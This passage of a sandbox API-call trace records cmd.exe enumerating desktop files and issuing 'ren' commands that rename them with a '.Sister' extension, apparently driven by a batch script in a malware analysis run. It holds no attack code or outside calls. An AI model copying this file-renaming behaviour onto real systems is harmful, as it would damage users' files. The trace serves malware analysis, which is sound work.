Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0144.705] GetProcessHeap () returned 0x21ed8c70000 [0144.705] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0144.705] GetProcessHeap () returned 0x21ed8c70000 [0144.705] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61950 [0144.705] GetProcessHeap () returned 0x21ed8c70000 [0144.706] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61950, Size=0xb2) returned 0x21ed8d61950 [0144.706] GetProcessHeap () returned 0x21ed8c70000 [0144.706] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61950) returned 0xb2 [0144.706] GetProcessHeap () returned 0x21ed8c70000 [0144.706] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d61a20 [0144.706] GetProcessHeap () returned 0x21ed8c70000 [0144.706] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61a20, Size=0x30) returned 0x21ed8d61a20 [0144.706] GetProcessHeap () returned 0x21ed8c70000 [0144.706] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61a20) returned 0x30 [0144.706] GetProcessHeap () returned 0x21ed8c70000 [0144.706] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d61a60 [0144.706] malloc (_Size=0x1ff9c) returned 0x21ed915fec0 [0144.709] GetProcessHeap () returned 0x21ed8c70000 [0144.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47390 [0144.709] GetProcessHeap () returned 0x21ed8c70000 [0144.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d46fd0 [0144.709] ??_V@YAXPEAX@Z () returned 0x1 [0144.710] malloc (_Size=0x1ff9c) returned 0x21ed915fec0 [0144.713] GetProcessHeap () returned 0x21ed8c70000 [0144.713] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d469d0 [0144.713] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed915fec0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0144.713] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d459b0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d42fd0 [0144.713] FindClose (in: hFindFile=0x21ed8d42fd0 | out: hFindFile=0x21ed8d42fd0) returned 1 [0144.713] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d459b0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42c70 [0144.713] FindClose (in: hFindFile=0x21ed8d42c70 | out: hFindFile=0x21ed8d42c70) returned 1 [0144.713] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x80dae0cf, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x80dae0cf, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d459b0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d439f0 [0144.713] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0144.714] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x80dae0cf, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x80dae0cf, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d459b0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0144.714] malloc (_Size=0x1ff9c) returned 0x21ed917fe70 [0144.714] ??_V@YAXPEAX@Z () returned 0x21ed917fe70 [0144.715] GetProcessHeap () returned 0x21ed8c70000 [0144.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d65a80 [0144.715] ??_V@YAXPEAX@Z () returned 0x1 [0144.715] ??_V@YAXPEAX@Z () returned 0x1 [0144.716] GetProcessHeap () returned 0x21ed8c70000 [0144.716] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61a60, Size=0x490) returned 0x21ed8d61a60 [0144.716] GetProcessHeap () returned 0x21ed8c70000 [0144.716] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61a60) returned 0x490 [0144.716] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0144.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.716] GetFileType (hFile=0x50) returned 0x2 [0144.716] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.716] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0144.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.722] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0144.768] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.768] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0144.768] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0144.768] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.768] GetFileType (hFile=0x50) returned 0x2 [0144.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.768] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0144.772] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.772] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0144.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.875] GetFileType (hFile=0x50) returned 0x2 [0144.875] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.876] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0144.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.882] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d61a30*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d61a30*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0144.895] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0144.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.895] GetFileType (hFile=0x50) returned 0x2 [0144.895] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.896] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0144.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.915] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0144.930] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0144.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.930] GetFileType (hFile=0x50) returned 0x2 [0144.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.930] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0144.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.940] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0144.954] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0144.958] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0144.958] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0144.959] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.959] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.960] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0144.960] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0144.960] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0144.960] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0144.960] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0144.960] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0144.960] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0144.960] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0144.960] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0144.960] ??_V@YAXPEAX@Z () returned 0x1 [0144.960] GetProcessHeap () returned 0x21ed8c70000 [0144.960] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d65b00 [0144.960] GetProcessHeap () returned 0x21ed8c70000 [0144.960] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d65b00, Size=0x130) returned 0x21ed8d65b00 [0144.960] GetProcessHeap () returned 0x21ed8c70000 [0144.960] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d65b00) returned 0x130 [0144.960] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.961] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.961] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.961] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed915fec0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.962] ??_V@YAXPEAX@Z () returned 0x1 [0144.962] GetProcessHeap () returned 0x21ed8c70000 [0144.962] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d65c40 [0144.962] GetProcessHeap () returned 0x21ed8c70000 [0144.962] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d65d80 [0144.962] GetProcessHeap () returned 0x21ed8c70000 [0144.962] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d65d80, Size=0x130) returned 0x21ed8d65d80 [0144.962] GetProcessHeap () returned 0x21ed8c70000 [0144.962] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d65d80) returned 0x130 [0144.962] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.962] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.962] GetProcessHeap () returned 0x21ed8c70000 [0144.962] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43570 [0144.962] GetProcessHeap () returned 0x21ed8c70000 [0144.962] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b520 [0144.963] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0144.963] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0144.963] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0144.963] GetLastError () returned 0x2 [0144.963] GetProcessHeap () returned 0x21ed8c70000 [0144.963] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9380080 [0144.963] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9380090 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.963] SetErrorMode (uMode=0x0) returned 0x0 [0144.963] SetErrorMode (uMode=0x1) returned 0x0 [0144.963] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed915fec0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0144.964] SetErrorMode (uMode=0x0) returned 0x1 [0144.964] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0144.964] GetProcessHeap () returned 0x21ed8c70000 [0144.964] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5a410 [0144.964] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0144.964] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0144.964] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0144.964] GetLastError () returned 0x2 [0144.964] ??_V@YAXPEAX@Z () returned 0x1 [0144.964] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.964] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.964] malloc (_Size=0xffce) returned 0x21ed916fea0 [0144.964] ??_V@YAXPEAX@Z () returned 0x21ed916fea0 [0144.965] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0144.965] GetLastError () returned 0x2 [0144.965] _get_osfhandle (_FileHandle=2) returned 0x54 [0144.965] GetFileType (hFile=0x54) returned 0x2 [0144.965] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0144.965] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0144.973] _get_osfhandle (_FileHandle=2) returned 0x54 [0144.973] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0144.990] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0144.990] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0144.990] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0145.005] longjmp () [0145.005] ??_V@YAXPEAX@Z () returned 0x1 [0145.005] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7971430, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x30ca2e90, ftLastAccessTime.dwHighDateTime=0x1d5e872, ftLastWriteTime.dwLowDateTime=0x30ca2e90, ftLastWriteTime.dwHighDateTime=0x1d5e872, nFileSizeHigh=0x0, nFileSizeLow=0x16a2d, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="hvO9HhgzXnxX2Pa-RAL.mp4", cAlternateFileName="")) returned 1 [0145.005] GetProcessHeap () returned 0x21ed8c70000 [0145.005] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d46410, Size=0x25c) returned 0x21ed8d46410 [0145.005] GetProcessHeap () returned 0x21ed8c70000 [0145.005] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d46410) returned 0x25c [0145.005] GetProcessHeap () returned 0x21ed8c70000 [0145.005] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9371850 [0145.005] GetProcessHeap () returned 0x21ed8c70000 [0145.005] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9371850, Size=0x30) returned 0x21ed9371850 [0145.006] GetProcessHeap () returned 0x21ed8c70000 [0145.006] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9371850) returned 0x30 [0145.006] GetProcessHeap () returned 0x21ed8c70000 [0145.006] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9371890 [0145.006] malloc (_Size=0x1ff9c) returned 0x21ed917fe80 [0145.009] GetProcessHeap () returned 0x21ed8c70000 [0145.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bfd0 [0145.009] ??_V@YAXPEAX@Z () returned 0x1 [0145.010] GetProcessHeap () returned 0x21ed8c70000 [0145.010] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9371890, Size=0x1f0) returned 0x21ed9371890 [0145.010] GetProcessHeap () returned 0x21ed8c70000 [0145.010] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9371890) returned 0x1f0 [0145.010] GetProcessHeap () returned 0x21ed8c70000 [0145.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9371a90 [0145.010] GetProcessHeap () returned 0x21ed8c70000 [0145.010] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9371a90, Size=0x290) returned 0x21ed9371a90 [0145.010] GetProcessHeap () returned 0x21ed8c70000 [0145.010] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9371a90) returned 0x290 [0145.010] GetProcessHeap () returned 0x21ed8c70000 [0145.011] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9371d30 [0145.013] GetProcessHeap () returned 0x21ed8c70000 [0145.013] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9371d30, Size=0x30) returned 0x21ed9371d30 [0145.013] GetProcessHeap () returned 0x21ed8c70000 [0145.013] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9371d30) returned 0x30 [0145.013] GetProcessHeap () returned 0x21ed8c70000 [0145.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9371d70 [0145.013] malloc (_Size=0x1ff9c) returned 0x21ed917fe80 [0145.016] GetProcessHeap () returned 0x21ed8c70000 [0145.016] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bbc0 [0145.016] ??_V@YAXPEAX@Z () returned 0x1 [0145.017] malloc (_Size=0x1ff9c) returned 0x21ed917fe80 [0145.024] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43390 [0145.024] FindClose (in: hFindFile=0x21ed8d43390 | out: hFindFile=0x21ed8d43390) returned 1 [0145.024] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d439f0 [0145.025] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0145.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x80dae0cf, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x80dae0cf, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d42c70 [0145.025] FindClose (in: hFindFile=0x21ed8d42c70 | out: hFindFile=0x21ed8d42c70) returned 1 [0145.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\hvO9HhgzXnxX2Pa-RAL.mp4", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7971430, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x30ca2e90, ftLastAccessTime.dwHighDateTime=0x1d5e872, ftLastWriteTime.dwLowDateTime=0x30ca2e90, ftLastWriteTime.dwHighDateTime=0x1d5e872, nFileSizeHigh=0x0, nFileSizeLow=0x16a2d, dwReserved0=0x4, dwReserved1=0x7, cFileName="hvO9HhgzXnxX2Pa-RAL.mp4", cAlternateFileName="HVO9HH~1.MP4")) returned 0x21ed8d43390 [0145.025] FindClose (in: hFindFile=0x21ed8d43390 | out: hFindFile=0x21ed8d43390) returned 1 [0145.025] _wcsnicmp (_String1="HVO9HH~1.MP4", _String2="hvO9HhgzXnxX2Pa-RAL.mp4", _MaxCount=0x17) returned 23 [0145.025] malloc (_Size=0x1ff9c) returned 0x21ed919fe30 [0145.026] ??_V@YAXPEAX@Z () returned 0x21ed919fe30 [0145.027] GetProcessHeap () returned 0x21ed8c70000 [0145.027] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed8cc8b50 [0145.027] ??_V@YAXPEAX@Z () returned 0x1 [0145.027] ??_V@YAXPEAX@Z () returned 0x1 [0145.029] GetProcessHeap () returned 0x21ed8c70000 [0145.029] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9371d70, Size=0x1f0) returned 0x21ed9371d70 [0145.029] GetProcessHeap () returned 0x21ed8c70000 [0145.029] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9371d70) returned 0x1f0 [0145.029] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0145.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.029] GetFileType (hFile=0x50) returned 0x2 [0145.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0145.029] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0145.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.121] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0145.161] GetCurrentDirectoryW (in: 